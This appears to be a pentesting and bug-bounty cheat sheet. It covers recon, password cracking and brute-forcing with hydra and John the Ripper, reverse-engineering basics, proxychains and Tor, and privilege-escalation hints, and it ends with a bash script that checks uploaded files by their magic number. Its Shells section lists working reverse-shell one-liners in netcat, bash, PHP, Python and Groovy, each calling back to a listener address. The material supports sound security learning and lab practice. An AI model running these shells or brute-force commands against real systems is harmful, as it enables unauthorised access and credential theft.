* [CheatSheet](#cheatsheet)
  * [Planned ToDo's](#planned-todos)
  * [Useful Guides and Links](#useful-guides-and-links)
  * [Local Webserver](#local-webserver)
    * [Python](#python)
    * [PHP](#php)
    * [Ruby](#ruby)
  * [Useful Tools](#useful-tools)
    * [nmap](#nmap)
    * [gobuster](#gobuster)
    * [wpscan](#wpscan)
    * [CeWL](#cewl)
    * [enum4linux](#enum4linux)
    * [goofile](#goofile)
    * [searchsploit](#searchsploit)
    * [John The Ripper – JTR](#john-the-ripper--jtr)
    * [hydra](#hydra)
    * [exiftool](#exiftool)
    * [radare2](#radare2)
    * [wfuzz](#wfuzz)
  * [Reverse Engineering](#reverse-engineering)
  * [Shells](#shells)
    * [Set Listener](#set-listener)
    * [Reverse Shell](#reverse-shell)
      * [netcat](#netcat)
      * [Java](#java)
      * [PHP](#php-1)
      * [Bash](#bash)
      * [Python](#python-1)
    * [Interactive Shell](#interactive-shell)
      * [Bash](#bash-1)
      * [Zsh](#zsh)
  * [Useful Scripts](#useful-scripts)
    * [HEX Converter](#hex-converter)
      * [Ascii to Hex](#ascii-to-hex)
      * [Hex to Ascii](#hex-to-ascii)
  * [Hide yourself](#hide-yourself)
    * [VPN](#vpn)
    * [Proxy Chains](#proxy-chains)
    * [Tor](#tor)
  * [Shellcode Dis/Assembler](#shellcode-disassembler)
  * [File Uploads](#file-uploads)
    * [Magic Numbers](#magic-numbers)
  * [Privilege Escalation](#privilege-escalation)

# CheatSheet

## Planned ToDo's

- [ ] write scripts for automating repetitive tasks like:
  1. look for the domain of the company
  2. look for subdomains of the domain
  3. look for DNS entries
  4. use [Google Hacking](https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06) for deeper recon
  5. generate a detailed report of all findings
  6. ...

- [x] create a docker-based environment for pentesting/bug bounty hunting (find a way to run GUI-based tools in docker)
  - [Kali-Docker](https://github.com/DennisFeldbusch/Kali-Docker)

## Useful Guides and Links

For Pentesting/BugBounty-Hunting there is a very detailed [map and guide](https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/) on how to proceed.

Very useful BugBounty [CheatSheet](https://github.com/EdOverflow/bugbounty-cheatsheet) from EdOverflow

Bug Bounty [Writeups](https://hackerone.com/hacktivity) for learning

## Local Webserver

Each of these serves the current directory over HTTP.

### Python

```bash
python -m SimpleHTTPServer    # Python 2
```

```bash
python3 -m http.server        # Python 3
```

### PHP

```bash
php -S 0.0.0.0:8000
```

### Ruby

```bash
ruby -run -e httpd . -p 8000
```

## Useful Tools

### [nmap](https://tools.kali.org/information-gathering/nmap)

scans networks

```bash
nmap -sC -sV -oA nmap/openadmin 10.10.10.171
```

* `-sC` = run the default scripts
* `-sV` = detect service versions
* `-oA` = write the output in all formats using the given base name

### [gobuster](https://tools.kali.org/web-applications/gobuster)

brute-forces websites to find directories and/or files

```bash
gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist
```

### [wpscan](https://www.kali.org/tools/wpscan/)

scans a target for WordPress-related findings

```bash
## basic scan
wpscan --url 10.10.10.10

## advanced scan with plugin detection (enumerate plugins and users)
wpscan --url 10.10.10.10 --enumerate p,u --plugins-detection aggressive
```

### [CeWL](https://tools.kali.org/password-attacks/cewl)

creates a wordlist from a website

```bash
cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10
```

* `-d 2` = spider depth
* `-m 5` = minimum word length
* `-w genwords.txt` = output file

### [enum4linux](https://tools.kali.org/information-gathering/enum4linux)

enumerates Windows and Samba systems

Ports to look for: 445, 139

```bash
enum4linux -U -o 10.10.10.10
```

* `-U` = get the user list
* `-o` = get OS information

### [goofile](https://tools.kali.org/information-gathering/goofile)

finds specific file types in a domain

```bash
goofile -d kali.org -f pdf
```

### [searchsploit](https://www.exploit-db.com/searchsploit)

```bash
searchsploit tomcat
```

### [John The Ripper – JTR](https://tools.kali.org/password-attacks/john)

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations against a service daemon such as an FTP or telnet server. John, however, needs the hash first, so the greater challenge is to first obtain the hash that is to be cracked. Nowadays hashes of common words are easily cracked using free rainbow tables available online: submit the hash to one of those sites and, if the hash is of a common word, the site shows the word almost instantly. Rainbow tables basically store common words and their hashes in a large database; the larger the database, the more words are covered.

| Command                                                                        | Description                                                   |
|--------------------------------------------------------------------------------|---------------------------------------------------------------|
| `john --wordlist=/usr/share/wordlists/rockyou.txt hash`                        | JTR password cracking with a wordlist                         |
| `john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`  | JTR cracking with the hash format forced to descrypt          |
| `john --format=descrypt hash --show`                                           | show the descrypt hashes already cracked in the previous run  |

### [hydra](https://www.kali.org/tools/hydra/)

```bash
hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30
```

* `-L wordlist` = usernames from a file, `-p test` = a single password
* `-V` = verbose, `-t 30` = number of parallel tasks
* the module argument is `path:POST body:failure string`; `^USER^` and `^PWD^` are replaced by the candidates

### [exiftool](https://exiftool.org/)

Tool to read and modify the metadata of files.

#### read metadata

```bash
exiftool file
```

#### write metadata

```bash
exiftool -artist=me file
```

### [radare2](https://www.kali.org/tools/radare2/)

radare2 is a tool for reverse-engineering

```bash
# start radare2
radare2 file

# the following commands are typed at the r2 prompt
# analyze all
aa

# list all functions
afl

# set selection to main function
s main

# disassemble
pdf

# show graph
VV
```

### [wfuzz](https://www.kali.org/tools/wfuzz/)

wfuzz is a web fuzzing tool

#### example of finding vhosts

```bash
# domain.tld, the wordlist path and the target address are placeholders
wfuzz -c -z file,/path/to/wordlist -H "Host: FUZZ.domain.tld" http://10.10.10.10/
```

## Reverse Engineering

### Get strings from binary

```bash
strings binaryFile
```

### Get hexdump from binary

```bash
hexdump --canonical binaryFile
```

### Get assembly

```bash
objdump -D -M x86-64 binaryFile
```

### Use radare2 to reverse engineer binary

### x86 registers

```
================ rax (64 bits)
        ======== eax (32 bits)
            ==== ax (16 bits)
            ==   ah (8 bits)
              == al (8 bits)
```

### register purposes

| Register | Purpose                                | Saved across calls |
|----------|----------------------------------------|--------------------|
| RAX      | temp register; return value            | no                 |
| RBX      | callee-saved                           | yes                |
| RCX      | used to pass 4th argument to functions | no                 |
| RDX      | used to pass 3rd argument to functions | no                 |
| RSP      | stack pointer                          | yes                |
| RBP      | callee-saved; base pointer             | yes                |
| RSI      | used to pass 2nd argument to functions | no                 |
| RDI      | used to pass 1st argument to functions | no                 |
| R8       | used to pass 5th argument to functions | no                 |
| R9       | used to pass 6th argument to functions | no                 |
| R10-11   | temporary                              | no                 |
| R12-15   | callee-saved registers                 | yes                |

### RISC (ARM) instruction set

```
MOV DESTINATION, SOURCE
```

### Stack

#### Stackpointer

- points to the next item on the stack
- grows downwards

#### Base pointer

- unchanged point in memory where the stack starts

```
memory:                      CPU:

0x0000   ________
        |        | <-------------- | SP |
        |        |         |------ | BP |
        |        |         |       | IP |
        |        | <-------|       | .. |
        |        |                 | .. |
        |        |                 | .. |
0xFFFF  |________|
```

## Shells

### Set Listener

```bash
nc -lnvp 4000
```

### [Reverse Shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

#### netcat

```bash
nc -e /bin/sh 10.10.15.22 4000
```

#### Java

```groovy
// Groovy syntax
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

#### PHP

```bash
php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
```

#### Bash

```bash
bash -i >& /dev/tcp/10.10.15.22/4000 0>&1
```

#### Python

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Interactive Shell

* works with python or python3

#### Bash

```bash
python -c 'import pty; pty.spawn("/bin/bash")'   # or python3
# press Ctrl-Z to background the shell, then in the local terminal:
stty raw -echo
fg
```

#### Zsh

```bash
python -c 'import pty; pty.spawn("/bin/bash")'   # or python3
# press Ctrl-Z to background the shell, then in the local terminal:
stty raw -echo; fg
```

## Useful Scripts

### HEX Converter

#### Ascii to Hex

```bash
#!/bin/bash
# prints the bytes of the first argument as hex, 16 per line
printf '%s' "$1" | hexdump -v -e '16/1 "%02x " "\n"'
```

#### Hex to Ascii

```bash
#!/bin/bash
# converts a plain hex string (whitespace is ignored) back to bytes
printf '%s' "$1" | xxd -r -p
```

## Hide yourself

Interesting [Stack Exchange](https://security.stackexchange.com/questions/103792/is-using-vpn-tor-and-proxychains-together-more-secure) link

### VPN

### [Proxy Chains](https://linuxhint.com/proxychains-tutorial/)

A proxy is an intermediary between the two communicating parties. If you send a request to a server, the proxy intercepts it and forwards it to the server as if the proxy itself had sent the request, so the server does not learn about the client. The reply takes the same path back.

A proxy chain is multiple proxy servers chained together, so it is much more difficult to find out who the initial sender (client) was.

### [Tor](https://de.wikipedia.org/wiki/Tor_(Netzwerk))

Here is a nice [graphic](https://www.eff.org/pages/tor-and-https) on who sees what in the Tor and HTTPS cases.

## [Shellcode Dis/Assembler](http://shell-storm.org/online/Online-Assembler-and-Disassembler/)

## File Uploads

Use

### Magic Numbers

* these magic numbers at the start of a file define the file type

```
BMP : 42 4D
JPG : FF D8 FF E0
PNG : 89 50 4E 47
GIF : 47 49 46 38
```

## Privilege Escalation

- find programs that can be executed with sudo without a password

```bash
sudo -l
```

- find files that belong to root but are readable by others because of group permissions
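As an added example for the Magic Numbers section above (not part of the original cheat sheet), here is a small bash script that reads a file's first bytes with `od`, matches them against the four signatures listed in that section and compares the detected type with the extension the uploader claims. This is the check an upload handler needs in addition to an extension or Content-Type check. The function names `detect_magic`, `check_upload` and `make_samples` and the sample files are constructed for this example.

```bash
#!/bin/bash
# Added example, not part of the original cheat sheet: validate an upload by
# its magic number instead of trusting the file extension. Function names and
# sample files are constructed for this example.

# Echo the type whose signature (from the Magic Numbers table above) matches
# the file's first bytes, or UNKNOWN. od prints the bytes as hex; spaces,
# newlines and letter case are normalised before matching.
detect_magic() {
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n' | tr 'a-f' 'A-F')
    case "$magic" in
        424D*)     echo BMP ;;      # 42 4D
        FFD8FFE0*) echo JPG ;;      # FF D8 FF E0 (JFIF; Exif JPEGs start FF D8 FF E1)
        89504E47*) echo PNG ;;      # 89 50 4E 47
        47494638*) echo GIF ;;      # 47 49 46 38
        *)         echo UNKNOWN ;;
    esac
}

# Return 0 when the claimed extension matches the detected type, 1 otherwise.
# A handler that only looks at the extension would accept the renamed file.
check_upload() {
    file=$1
    ext=$(printf '%s' "${file##*.}" | tr 'a-z' 'A-Z')
    [ "$ext" = JPEG ] && ext=JPG
    detected=$(detect_magic "$file")
    if [ "$detected" = "$ext" ]; then
        return 0
    fi
    echo "rejected: $file claims $ext but starts like $detected" >&2
    return 1
}

# Constructed sample inputs: a file with a genuine PNG header and a plain text
# file renamed to .png. Echoes the directory so the caller can clean it up.
make_samples() {
    dir=$(mktemp -d)
    printf '\211PNG\r\n\032\n' > "$dir/logo.png"
    printf 'just text\n' > "$dir/notreally.png"
    echo "$dir"
}

samples=$(make_samples)
for f in "$samples"/*.png; do
    if check_upload "$f"; then
        echo "accepted: $f ($(detect_magic "$f"))"
    fi
done
rm -rf "$samples"
```

Run directly, the script accepts `logo.png` and rejects `notreally.png`. Only the four signatures on this page are covered; a real handler would also cap the file size and store uploads outside the web root, which is outside the scope of this check.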